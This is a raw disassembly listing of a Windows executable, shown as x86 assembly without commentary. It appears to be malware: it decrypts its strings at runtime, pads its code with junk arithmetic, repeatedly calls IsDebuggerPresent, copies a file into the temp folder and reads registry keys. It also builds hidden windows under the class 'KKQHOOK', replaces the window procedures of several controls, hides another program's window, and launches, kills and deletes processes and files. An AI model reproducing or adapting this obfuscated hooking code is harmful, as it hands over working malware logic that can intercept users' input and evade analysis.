var_368 = byte ptr -368h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_254 = word ptr -254h
var_252 = byte ptr -252h
var_251 = byte ptr -251h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_24C = byte ptr -24Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 3A0h
push ebx
push esi
push edi
mov ebx, 5B68h
mov eax, ebx
add eax, ebx
mov ebx, eax
mov eax, dword_446984
mov [ebp+var_374], eax
mov [ebp+var_250], 4A20h
inc [ebp+var_250]
lea eax, [ebp+var_104]
push eax
push 104h
call sub_40C9BC ; GetTempPathA
lea ecx, [ebp+var_104]
or eax, 0FFFFFFFFh
loc_408C63: ; CODE XREF: sub_408C17+51�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408C63
mov edi, eax
mov esi, 18h
sub esi, dword_44697C
push esi
lea esi, [ebp+var_104]
add esi, edi
push esi
call sub_401777
add esp, 8
call sub_40C968 ; RtlGetLastWin32Error
push 4
push offset dword_446EB4
call sub_408B8B
add esp, 8
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CE78
add esp, 8
mov [ebp+var_251], 0DFh
movzx eax, [ebp+var_251]
imul eax, 64FAh
mov [ebp+var_251], al
push 0
lea eax, [ebp+var_104]
push eax
push offset dword_41E9B0
call sub_40CA70 ; CopyFileA
call sub_40C938 ; GetCurrentProcessId
lea edi, [ebp+var_377]
lea esi, byte_446988
mov ecx, 3
rep movsb
mov [ebp+var_36C], 104h
push 21h
push offset word_446E92
call sub_408B8B
add esp, 8
mov [ebp+var_390], eax
push 4
push offset byte_446E8D
call sub_408B8B
add esp, 8
lea edi, [ebp+var_37C]
push edi
lea edi, [ebp+var_36C]
push edi
lea edi, [ebp+var_368]
push edi
push eax
mov edi, [ebp+var_390]
push [ebp+var_390]
push 80000002h
call sub_4014CB
add esp, 18h
mov ebx, eax
call sub_40C9D4 ; GetVersion
cmp ebx, 0
jz loc_408F51
call sub_40C998 ; GetProcessHeap
lea edi, [ebp+var_383]
lea esi, aKm1akw ; "KM1Akw"
mov ecx, 7
rep movsb
push 104h
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_368]
push eax
call sub_40C920 ; ExpandEnvironmentStringsA
mov [ebp+var_252], 9Fh
add [ebp+var_252], 1
push 0Eh
push offset word_446E7E
call sub_408B8B
push eax
lea edi, [ebp+var_24C]
push edi
call sub_40CE78
call sub_40CA58 ; IsDebuggerPresent
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_24C]
push eax
call sub_40CE78
lea edi, [ebp+var_389]
lea esi, word_446992
mov ecx, 3
rep movsw
call sub_4045BD
mov [ebp+var_370], eax
mov [ebp+var_24E], 3633h
movzx eax, [ebp+var_24E]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_24E], ax
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CE24
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CE24
add esp, 30h
mov [ebp+var_254], 596Bh
sub [ebp+var_254], 707Fh
mov [ebp+var_148], 44h
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
cmp [ebp+var_370], 0
jz short loc_408E74
lea eax, [ebp+var_148]
push eax
call sub_40466A
pop ecx
jmp short loc_408E7D
; ---------------------------------------------------------------------------
loc_408E74: ; CODE XREF: sub_408C17+24C�j
mov [ebp+var_118], 0
loc_408E7D: ; CODE XREF: sub_408C17+25B�j
lea eax, [ebp+var_264]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_24C]
push eax
push 0
call sub_40CB78 ; CreateProcessA
or eax, eax
jz loc_408F45
mov [ebp+var_392], 1FD7h
sub [ebp+var_392], 176Dh
push [ebp+var_260]
call sub_40C9B0 ; CloseHandle
mov [ebp+var_394], 5838h
movzx eax, [ebp+var_394]
imul eax, 0E60h
mov [ebp+var_394], ax
push 0EA60h
call sub_40CDDC
pop ecx
mov [ebp+var_396], 1716h
movzx eax, [ebp+var_396]
imul eax, 5D50h
mov [ebp+var_396], ax
push 0
push [ebp+var_264]
call sub_40CB00 ; TerminateProcess
lea edi, [ebp+var_399]
lea esi, byte_446998
mov ecx, 3
rep movsb
push [ebp+var_264]
call sub_40C9B0 ; CloseHandle
mov eax, dword_44699B
mov [ebp+var_39D], eax
loc_408F45: ; CODE XREF: sub_408C17+290�j
lea eax, [ebp+var_104]
push eax
call sub_40C908 ; DeleteFileA
loc_408F51: ; CODE XREF: sub_408C17+142�j
pop edi
pop esi
pop ebx
leave
retn
sub_408C17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F56 proc near ; CODE XREF: sub_408FEB+30�p
; sub_408FEB+6B�p ...
var_1006 = dword ptr -1006h
var_1002 = byte ptr -1002h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1008h
call sub_40C8BC
push edi
call sub_40C968 ; RtlGetLastWin32Error
push 5
push [ebp+arg_0]
call sub_40CBC0 ; GetWindow
mov edi, eax
mov [ebp+var_2], 53FCh
add [ebp+var_2], 390Ch
loc_408F81: ; CODE XREF: sub_408F56+90�j
or edi, edi
jnz short loc_408F89
xor eax, eax
jmp short loc_408FE8
; ---------------------------------------------------------------------------
loc_408F89: ; CODE XREF: sub_408F56+2D�j
mov [ebp+var_3], 5
sub [ebp+var_3], 6Eh
mov eax, dword_44699F
mov [ebp+var_1006], eax
push 0FFFh
lea eax, [ebp+var_1002]
push eax
push edi
call sub_40CBCC ; GetClassNameA
mov eax, 0Ch
sub eax, dword_43C098
push eax
push [ebp+arg_4]
lea eax, [ebp+var_1002]
push eax
call sub_401883
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_408FD7
mov eax, edi
jmp short loc_408FE8
; ---------------------------------------------------------------------------
loc_408FD7: ; CODE XREF: sub_408F56+7B�j
push 2
push edi
call sub_40CBC0 ; GetWindow
mov edi, eax
call sub_40C9D4 ; GetVersion
jmp short loc_408F81
; ---------------------------------------------------------------------------
loc_408FE8: ; CODE XREF: sub_408F56+31�j
; sub_408F56+7F�j
pop edi
leave
retn
sub_408F56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408FEB proc near ; CODE XREF: sub_40B525+1F4�p
var_19F = byte ptr -19Fh
var_197 = byte ptr -197h
var_194 = dword ptr -194h
var_18E = word ptr -18Eh
var_18B = byte ptr -18Bh
var_18A = word ptr -18Ah
var_188 = dword ptr -188h
var_182 = byte ptr -182h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = dword ptr -178h
var_171 = byte ptr -171h
var_16E = word ptr -16Eh
var_16C = byte ptr -16Ch
var_166 = dword ptr -166h
var_162 = dword ptr -162h
var_15E = byte ptr -15Eh
var_159 = byte ptr -159h
var_151 = byte ptr -151h
var_14A = byte ptr -14Ah
var_144 = dword ptr -144h
var_140 = word ptr -140h
var_13E = word ptr -13Eh
var_13C = word ptr -13Ch
var_139 = byte ptr -139h
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_12E = word ptr -12Eh
var_12B = byte ptr -12Bh
var_12A = word ptr -12Ah
var_128 = dword ptr -128h
var_123 = byte ptr -123h
var_122 = word ptr -122h
var_120 = dword ptr -120h
var_11A = word ptr -11Ah
var_118 = dword ptr -118h
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = dword ptr -10Ah
var_106 = dword ptr -106h
var_102 = byte ptr -102h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A0h
push ebx
push esi
push edi
lea edi, [ebp+var_14A]
lea esi, aE8i ; "e|8I "
mov ecx, 3
rep movsw
push 9
push offset dword_446E74
call sub_40129C
push eax
push [ebp+arg_0]
call sub_408F56
mov [ebp+var_118], eax
mov [ebp+var_11A], 5C17h
movzx eax, [ebp+var_11A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_11A], ax
push 8
push offset byte_446E6B
call sub_40129C
push eax
push [ebp+var_118]
call sub_408F56
mov ds:dword_41D828, eax
mov [ebp+var_120], 5547h
mov eax, [ebp+var_120]
mov edx, eax
add edx, eax
mov [ebp+var_120], edx
push 0
push ds:dword_41D828
call sub_40CCB0 ; ShowWindow
call sub_40C9D4 ; GetVersion
lea eax, [ebp+var_112]
push eax
push [ebp+var_118]
call sub_40CBA8 ; GetWindowRect
mov ebx, 46AEh
mov eax, ebx
add eax, ebx
mov ebx, eax
push 0
push ds:dword_41E9AC
push 0
push [ebp+var_118]
mov eax, [ebp+var_106]
sub eax, [ebp+var_10E]
push eax
mov eax, [ebp+var_10A]
sub eax, [ebp+var_112]
push eax
push 0
push 0
push 50800000h
push offset byte_447569
push offset aKkqhook ; "KKQHOOK"
push 200h
call sub_40CCBC ; CreateWindowExA
mov ds:dword_41FD44, eax
lea edi, [ebp+var_151]
lea esi, aBvcT4 ; "bc$t4"
mov ecx, 7
rep movsb
push 6
push offset byte_446E5B
call sub_40129C
mov [ebp+var_178], eax
push 19h
push offset byte_446E41
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_41FD44
mov edi, dword_43C098
add edi, 31h
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43C094
add edi, 12h
push edi
push edi
push 50800000h
push eax
mov edi, [ebp+var_178]
push edi
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_41D824, eax
call sub_40C938 ; GetCurrentProcessId
push 6
push offset byte_446E5B
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_41FD44
mov edi, dword_43C098
add edi, 121h
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43C098
add edi, 46h
push edi
mov edi, dword_43C094
add edi, 12h
push edi
push 50800009h
push offset byte_447569
push eax
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_430D90, eax
mov [ebp+var_123], 0A4h
add [ebp+var_123], 1
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 2BCh
push 0
push 0
mov eax, dword_43C098
mov edx, 13h
sub edx, eax
push edx
mov eax, dword_43C098
add eax, 9
push eax
call sub_40CD1C ; CreateFontA
mov [ebp+var_144], eax
lea edi, [ebp+var_159]
lea esi, aAFqkY ; "a*FQk~y"
mov ecx, 2
rep movsd
push 1
push [ebp+var_144]
push 30h
push ds:dword_41D824
call sub_40CC8C ; SendMessageA
call sub_40C944 ; GetCurrentThreadId
push 8
push offset dword_446E38
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_430D90
mov edi, dword_43C098
add edi, 121h
push edi
mov edi, dword_43C094
add edi, 30h
push edi
mov edi, dword_43C094
add edi, 38h
push edi
mov edi, dword_43C094
add edi, 12h
push edi
push 50800003h
push offset byte_447569
push eax
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_432FB4, eax
call sub_40C998 ; GetProcessHeap
push 8
push offset dword_446E38
call sub_40129C
add esp, 48h
push 0
push ds:dword_41E9AC
push 0
push ds:dword_430D90
mov edi, dword_43C098
add edi, 121h
push edi
mov edi, dword_43C098
add edi, 31h
push edi
mov edi, dword_43C098
add edi, 2Fh
push edi
mov edi, dword_43C098
add edi, 47h
push edi
push 50800003h
push offset byte_447569
push eax
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_41E9A4, eax
lea edi, [ebp+var_15E]
lea esi, aTbF ; "t F"
mov ecx, 5
rep movsb
mov [ebp+var_2], 1
jmp loc_409425
; ---------------------------------------------------------------------------
loc_409336: ; CODE XREF: sub_408FEB+441�j
mov [ebp+var_188], 59A5h
sub [ebp+var_188], 5CEh
lea edi, [ebp+var_197]
lea esi, asc_4469BD ; "::"
mov ecx, 3
rep movsb
mov [ebp+var_18A], 556Ch
inc [ebp+var_18A]
push 4
push offset aTse ; ""
call sub_40129C
movzx edi, [ebp+var_2]
push edi
push eax
lea edi, [ebp+var_182]
push edi
call sub_40CE54
mov [ebp+var_18B], 0D4h
sub [ebp+var_18B], 0DDh
lea eax, [ebp+var_182]
push eax
push 0
push 143h
push ds:dword_432FB4
call sub_40CC8C ; SendMessageA
mov [ebp+var_18E], 2B6Dh
inc [ebp+var_18E]
push 6
push offset aEztse ; ""
call sub_40129C
movzx edi, [ebp+var_2]
add edi, 4
push edi
push eax
lea edi, [ebp+var_182]
push edi
call sub_40CE54
add esp, 28h
mov [ebp+var_194], 3D16h
add [ebp+var_194], 26FBh
lea eax, [ebp+var_182]
push eax
push 0
push 143h
push ds:dword_41E9A4
call sub_40CC8C ; SendMessageA
lea edi, [ebp+var_19F]
lea esi, aC7iO ; "c7i!~~O"
movsd
movsd
inc [ebp+var_2]
loc_409425: ; CODE XREF: sub_408FEB+346�j
movzx eax, [ebp+var_2]
cmp eax, 0Dh
jl loc_409336
push 6
push offset byte_446E5B
call sub_40129C
mov [ebp+var_17C], eax
push 10h
push offset aUCC ; "ŗӗ"
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_41FD44
mov edi, dword_43C098
add edi, 5
push edi
mov edi, dword_43C094
add edi, 65h
push edi
mov edi, dword_43C098
add edi, 63h
push edi
mov edi, dword_43C098
add edi, 0B8h
push edi
push 50000000h
push eax
mov edi, [ebp+var_17C]
push edi
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_413E04, eax
mov [ebp+var_128], 216Ah
add [ebp+var_128], 2B5Fh
push 6
push offset byte_446E5B
call sub_40129C
mov [ebp+var_180], eax
push 0Fh
push offset byte_446E0B
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_41FD44
mov edi, dword_43C094
add edi, 0Eh
push edi
mov edi, dword_43C098
add edi, 4Ch
push edi
mov edi, dword_43C094
add edi, 8Fh
push edi
mov edi, dword_43C098
add edi, 0B8h
push edi
push 50000000h
push eax
mov edi, [ebp+var_180]
push edi
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_432FAC, eax
mov [ebp+var_12A], 259h
movzx eax, [ebp+var_12A]
imul eax, 29ADh
mov [ebp+var_12A], ax
push 6
push offset byte_446E5B
call sub_40129C
mov [ebp-184h], eax
push 0Ch
push offset word_446DFE
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_41FD44
mov edi, dword_43C094
add edi, 0Eh
push edi
mov edi, dword_43C098
add edi, 4Bh
push edi
mov edi, dword_43C098
add edi, 0AEh
push edi
mov edi, dword_43C098
add edi, 0B8h
push edi
push 50000000h
push eax
mov edi, [ebp-184h]
push edi
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_4351E4, eax
mov [ebp+var_12B], 35h
movzx eax, [ebp+var_12B]
imul eax, 23CBh
mov [ebp+var_12B], al
push 6
push offset byte_446E5B
call sub_40129C
mov [ebp+var_188], eax
push 4Ah
push offset byte_446DB3
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_41FD44
mov edi, dword_43C098
add edi, 5
push edi
mov edi, dword_43C098
add edi, 1D9h
push edi
mov edi, dword_43C094
add edi, 0E4h
push edi
mov edi, dword_43C098
add edi, 13h
push edi
push 50000000h
push eax
mov edi, [ebp+var_188]
push edi
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_432FB0, eax
call sub_40C944 ; GetCurrentThreadId
push 6
push offset byte_446E5B
call sub_40129C
mov [ebp-18Ch], eax
push 26h
push offset aCCCCCCS ; "җҗėӗΗٙ"
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_41FD44
mov edi, dword_43C098
add edi, 5
push edi
mov edi, dword_43C094
add edi, 0FBh
push edi
mov edi, dword_43C098
add edi, 0F4h
push edi
mov edi, dword_43C098
add edi, 13h
push edi
push 50000000h
push eax
mov edi, [ebp-18Ch]
push edi
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_43A498, eax
mov eax, dword_4469C8
mov [ebp+var_162], eax
push offset byte_434080
lea eax, [ebp+var_102]
push eax
call sub_40CE54
add esp, 58h
mov [ebp+var_12E], 20C4h
add [ebp+var_12E], 5ADCh
mov [ebp+var_3], 4
jmp short loc_40970F
; ---------------------------------------------------------------------------
loc_4096FF: ; CODE XREF: sub_408FEB+729�j
movzx eax, [ebp+var_3]
mov [ebp+eax+var_102], 78h
add [ebp+var_3], 1
loc_40970F: ; CODE XREF: sub_408FEB+712�j
mov al, [ebp+var_3]
cmp al, 0Ch
jb short loc_4096FF
call sub_40C9D4 ; GetVersion
push 4
push offset byte_446D87
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_430D90
mov edi, dword_43C098
mov esi, edi
add esi, 0Dh
push esi
mov esi, edi
add esi, 77h
push esi
add edi, 9
push edi
push edi
push 50800800h
lea edi, [ebp+var_102]
push edi
push eax
push 200h
call sub_40CCBC ; CreateWindowExA
mov ds:dword_410890, eax
mov eax, dword_4469CC
mov [ebp+var_166], eax
push 4
push offset byte_446D87
call sub_40129C
push 0
push ds:dword_41E9AC
push 0
push ds:dword_430D90
mov edi, dword_43C098
add edi, 0Dh
push edi
mov edi, dword_43C098
add edi, 3Bh
push edi
mov edi, dword_43C098
add edi, 54h
push edi
mov edi, dword_43C098
add edi, 9
push edi
push 50800000h
push offset byte_447569
push eax
push 200h
call sub_40CCBC ; CreateWindowExA
mov ds:dword_41E99C, eax
call sub_40C998 ; GetProcessHeap
push 0
push 78h
push 0CCh
push ds:dword_41E99C
call sub_40CC8C ; SendMessageA
call sub_40CA58 ; IsDebuggerPresent
push 6
push offset dword_446D80
call sub_40129C
mov [ebp-190h], eax
push 16h
push offset byte_446D69
call sub_40129C
add esp, 20h
push 0
push ds:dword_41E9AC
push 0
push ds:dword_41FD44
mov edi, dword_43C098
add edi, 0Ch
push edi
mov edi, dword_43C098
add edi, 90h
push edi
mov edi, dword_43C098
add edi, 135h
push edi
mov edi, dword_43C094
add edi, 1Ch
push edi
push 50800000h
push eax
mov edi, [ebp-190h]
push edi
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_4351E8, eax
lea edi, [ebp+var_16C]
lea esi, aBNB ; "*N;"
mov ecx, 3
rep movsw
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 190h
push 0
push 0
mov eax, dword_43C098
mov edx, 11h
sub edx, eax
push edx
mov eax, dword_43C098
add eax, 5
push eax
call sub_40CD1C ; CreateFontA
mov ebx, eax
mov [ebp+var_134], 6046h
inc [ebp+var_134]
push 1
push ebx
push 30h
push ds:dword_432FB4
call sub_40CC8C ; SendMessageA
call sub_40CA58 ; IsDebuggerPresent
push 1
push ebx
push 30h
push ds:dword_41E9A4
call sub_40CC8C ; SendMessageA
call sub_40C998 ; GetProcessHeap
push 1
push ebx
push 30h
push ds:dword_410890
call sub_40CC8C ; SendMessageA
mov [ebp+var_138], 7C71h
sub [ebp+var_138], 5546h
push 1
push ebx
push 30h
push ds:dword_41E99C
call sub_40CC8C ; SendMessageA
call sub_40CA58 ; IsDebuggerPresent
push 1
push ebx
push 30h
push ds:dword_432FAC
call sub_40CC8C ; SendMessageA
mov [ebp+var_139], 82h
sub [ebp+var_139], 0Fh
push 1
push ebx
push 30h
push ds:dword_413E04
call sub_40CC8C ; SendMessageA
mov [ebp+var_122], 63D7h
movzx eax, [ebp+var_122]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_122], ax
push 1
push ebx
push 30h
push ds:dword_4351E4
call sub_40CC8C ; SendMessageA
push 1
push ebx
push 30h
push ds:dword_4351E8
call sub_40CC8C ; SendMessageA
mov ax, word_4469D6
mov [ebp+var_16E], ax
push 0FFFFFFFCh
push ds:dword_432FB4
call sub_40CC2C ; GetWindowLongA
mov ds:dword_41FC38, eax
mov [ebp+var_13C], 3D1h
inc [ebp+var_13C]
push offset sub_40B3C6
push 0FFFFFFFCh
push ds:dword_432FB4
call sub_40CC38 ; SetWindowLongA
call sub_40C998 ; GetProcessHeap
push 0FFFFFFFCh
push ds:dword_41E9A4
call sub_40CC2C ; GetWindowLongA
mov ds:dword_41E9A0, eax
lea edi, [ebp+var_171]
lea esi, byte_4469D8
mov ecx, 3
rep movsb
push offset sub_40B3C6
push 0FFFFFFFCh
push ds:dword_41E9A4
call sub_40CC38 ; SetWindowLongA
push 0FFFFFFFCh
push ds:dword_410890
call sub_40CC2C ; GetWindowLongA
mov ds:dword_40E060, eax
call sub_40CA58 ; IsDebuggerPresent
push offset sub_40B3C6
push 0FFFFFFFCh
push ds:dword_410890
call sub_40CC38 ; SetWindowLongA
push 0FFFFFFFCh
push ds:dword_41E99C
call sub_40CC2C ; GetWindowLongA
mov ds:dword_413E00, eax
mov [ebp+var_13E], 3D62h
add [ebp+var_13E], 3454h
push offset sub_40B3C6
push 0FFFFFFFCh
push ds:dword_41E99C
call sub_40CC38 ; SetWindowLongA
mov [ebp+var_140], 61B1h
add [ebp+var_140], 29B9h
push ds:dword_432FB4
call sub_40CBD8 ; SetFocus
call sub_40C998 ; GetProcessHeap
pop edi
pop esi
pop ebx
leave
retn
sub_408FEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_409A96 proc near ; DATA XREF: sub_40AB84+7A2�o
var_55F0 = dword ptr -55F0h
var_55EC = dword ptr -55ECh
var_55E6 = word ptr -55E6h
var_55E4 = byte ptr -55E4h
var_55DD = byte ptr -55DDh
var_55DC = dword ptr -55DCh
var_55D8 = dword ptr -55D8h
var_55D4 = byte ptr -55D4h
var_55D3 = byte ptr -55D3h
var_55CD = byte ptr -55CDh
var_55C5 = byte ptr -55C5h
var_55C4 = word ptr -55C4h
var_55C2 = byte ptr -55C2h
var_4738 = dword ptr -4738h
var_4731 = byte ptr -4731h
var_472C = byte ptr -472Ch
var_4724 = byte ptr -4724h
var_471F = byte ptr -471Fh
var_471E = byte ptr -471Eh
var_4718 = byte ptr -4718h
var_4710 = byte ptr -4710h
var_4708 = byte ptr -4708h
var_4705 = byte ptr -4705h
var_4702 = word ptr -4702h
var_4700 = dword ptr -4700h
var_46FC = dword ptr -46FCh
var_46F8 = dword ptr -46F8h
var_46F4 = dword ptr -46F4h
var_46EE = word ptr -46EEh
var_46EC = dword ptr -46ECh
var_46E8 = dword ptr -46E8h
var_46E2 = word ptr -46E2h
var_46E0 = word ptr -46E0h
var_46DE = word ptr -46DEh
var_46DC = byte ptr -46DCh
var_46D8 = dword ptr -46D8h
var_46D4 = dword ptr -46D4h
var_46CE = word ptr -46CEh
var_46CC = dword ptr -46CCh
var_46C6 = byte ptr -46C6h
var_45D4 = dword ptr -45D4h
var_45D0 = dword ptr -45D0h
var_45CC = dword ptr -45CCh
var_45C7 = byte ptr -45C7h
var_45C3 = byte ptr -45C3h
var_35D0 = byte ptr -35D0h
var_35CE = dword ptr -35CEh
var_35CA = word ptr -35CAh
var_35C8 = dword ptr -35C8h
var_35C4 = dword ptr -35C4h
var_35C0 = byte ptr -35C0h
var_35BB = byte ptr -35BBh
var_25BC = byte ptr -25BCh
var_25B9 = byte ptr -25B9h
var_25B7 = byte ptr -25B7h
var_15C8 = dword ptr -15C8h
var_15C4 = dword ptr -15C4h
var_15BE = byte ptr -15BEh
var_15BD = byte ptr -15BDh
var_15B9 = byte ptr -15B9h
var_15B8 = dword ptr -15B8h
var_1164 = byte ptr -1164h
var_115F = byte ptr -115Fh
var_115A = byte ptr -115Ah
var_1155 = byte ptr -1155h
var_1150 = byte ptr -1150h
var_1149 = byte ptr -1149h
var_1148 = byte ptr -1148h
var_1140 = word ptr -1140h
var_113E = dword ptr -113Eh
var_113A = byte ptr -113Ah
var_1134 = word ptr -1134h
var_1132 = word ptr -1132h
var_112F = byte ptr -112Fh
var_1030 = dword ptr -1030h
var_102C = dword ptr -102Ch
var_1026 = word ptr -1026h
var_1024 = dword ptr -1024h
var_1020 = dword ptr -1020h
var_101A = byte ptr -101Ah
var_1019 = byte ptr -1019h
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = byte ptr -1010h
var_F0C = dword ptr -0F0Ch
var_F08 = byte ptr -0F08h
var_708 = dword ptr -708h
var_703 = byte ptr -703h
var_604 = dword ptr -604h
var_600 = byte ptr -600h
var_5A8 = byte ptr -5A8h
var_5A7 = byte ptr -5A7h
var_400 = byte ptr -400h
push ebp
mov ebp, esp
mov eax, 55F0h
call sub_40C8BC
push ebx
push esi
push edi
call sub_40C998 ; GetProcessHeap
mov ax, word_4469DB
mov [ebp+var_1132+1], ax
mov ax, word_4469DD
mov [ebp+var_1134+1], ax
lea edi, [ebp+var_1134]
lea esi, byte_4469DF
xor ecx, ecx
inc ecx
rep movsb
lea edi, [ebp+var_113A]
lea esi, dword_4469E0
mov ecx, 3
rep movsw
call sub_40C9C8 ; GetTickCount
push eax
call sub_40CE60
pop ecx
mov eax, dword_4469E6
mov [ebp+var_113E], eax
loc_409B01: ; CODE XREF: sub_409A96+1089�j
mov ax, word_4469EA
mov [ebp+var_1140], ax
mov eax, 13h
sub eax, dword_43C098
push eax
lea eax, [ebp+var_703]
push eax
call sub_401777
call sub_40C9D4 ; GetVersion
push 9
push offset aTItS ; "ę"
call sub_40129C
lea edi, [ebp+var_703]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CE54
lea edi, [ebp+var_1148]
lea esi, aJsvquX ; "jsvQu&x"
movsd
movsd
lea eax, [ebp+var_400]
push eax
call sub_403530
mov [ebp+var_1019], 0AEh
movzx eax, [ebp+var_1019]
imul eax, 1AD0h
mov [ebp+var_1019], al
lea edi, [ebp+var_1149]
lea esi, byte_4469F4
xor ecx, ecx
inc ecx
rep movsb
push 9
push offset aNsst ; "Ǎ"
call sub_40129C
mov edi, dword_43C0B8
push off_43C0C0[edi*4]
push eax
lea edi, [ebp+var_F08]
push edi
call sub_40CE54
mov [ebp+var_101A], 26h
add [ebp+var_101A], 13h
push 1
push offset aS ; ""
call sub_40129C
mov edi, 0Ch
sub edi, dword_43C098
push edi
push eax
mov edi, dword_43C0B8
push off_43C0C0[edi*4]
call sub_401883
add esp, 4Ch
cmp eax, 0FFFFh
jnz short loc_409C1A
push 9
push offset aSS ; "ę"
call sub_40129C
push eax
lea edi, [ebp+var_F08]
push edi
call sub_40CE78
add esp, 10h
loc_409C1A: ; CODE XREF: sub_409A96+166�j
mov [ebp+var_1020], 3BECh
sub [ebp+var_1020], 7A91h
and [ebp+var_1018], 0
mov [ebp+var_1030], 4
push 1Ah
push offset word_446D2E
call sub_40129C
mov [ebp+var_15B8], eax
push 3
push offset asc_446D2A ; ""
call sub_40129C
lea edi, [ebp+var_1150]
push edi
lea edi, [ebp+var_1030]
push edi
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp+var_15B8]
push edi
push 80000001h
call sub_4014CB
lea edi, [ebp+var_1155]
lea esi, aWgV ; "Wg/v"
mov ecx, 5
rep movsb
lea edi, [ebp+var_115A]
lea esi, aVH ; "-V,H"
mov ecx, 5
rep movsb
push 7
push offset aIKt ; "Ԋ"
call sub_40129C
push [ebp+var_1018]
push eax
lea edi, [ebp+var_112F]
push edi
call sub_40CE54
mov [ebp+var_1024], 63D5h
sub [ebp+var_1024], 4DE7h
lea eax, [ebp+var_112F]
push eax
lea eax, [ebp+var_F08]
push eax
call sub_40CE78
push 1
push offset asc_446D20 ; ""
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_F08]
push edi
push 0
call sub_4063C4
add esp, 6Ch
mov ebx, eax
mov [ebp+var_1026], 5152h
inc [ebp+var_1026]
or ebx, ebx
jnz short loc_409D60
mov [ebp+var_15B9], 0DBh
add [ebp+var_15B9], 1
lea eax, [ebp+var_400]
push eax
call sub_4035A5
pop ecx
call sub_40C944 ; GetCurrentThreadId
jmp loc_40AA0B
; ---------------------------------------------------------------------------
loc_409D60: ; CODE XREF: sub_409A96+2A3�j
and [ebp+var_1018], 0
push 1Ah
push offset word_446D2E
call sub_40129C
mov [ebp-15BCh], eax
push 3
push offset asc_446D2A ; ""
call sub_40129C
push 4
push 4
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp-15BCh]
push edi
push 80000001h
call sub_401614
mov [ebp+var_102C], 55F4h
inc [ebp+var_102C]
push 0
lea eax, [ebp+var_400]
push eax
call sub_401AF1
add esp, 30h
mov [ebp+var_F0C], eax
or eax, eax
jz loc_40AA0B
call sub_40C944 ; GetCurrentThreadId
lea eax, [ebp+var_400]
push eax
call sub_40C908 ; DeleteFileA
call sub_40C968 ; RtlGetLastWin32Error
lea eax, [ebp+var_400]
push eax
call sub_4035A5
pop ecx
and [ebp+var_708], 0
jmp loc_40A9D2
; ---------------------------------------------------------------------------
loc_409E00: ; CODE XREF: sub_409A96+F5F�j
call sub_40C998 ; GetProcessHeap
cmp [ebp+var_600], 0
jz loc_40A9D2
call sub_40C938 ; GetCurrentProcessId
lea ecx, [ebp+var_600]
or eax, 0FFFFFFFFh
loc_409E20: ; CODE XREF: sub_409A96+38F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409E20
cmp eax, 5Ch
jb loc_40A9D2
call sub_40C998 ; GetProcessHeap
mov [ebp+var_5A8], 0
push 0FFFh
lea eax, [ebp+var_25BC]
push eax
lea eax, [ebp+var_5A7]
push eax
call sub_408A3D
call sub_40C998 ; GetProcessHeap
push 0FFFh
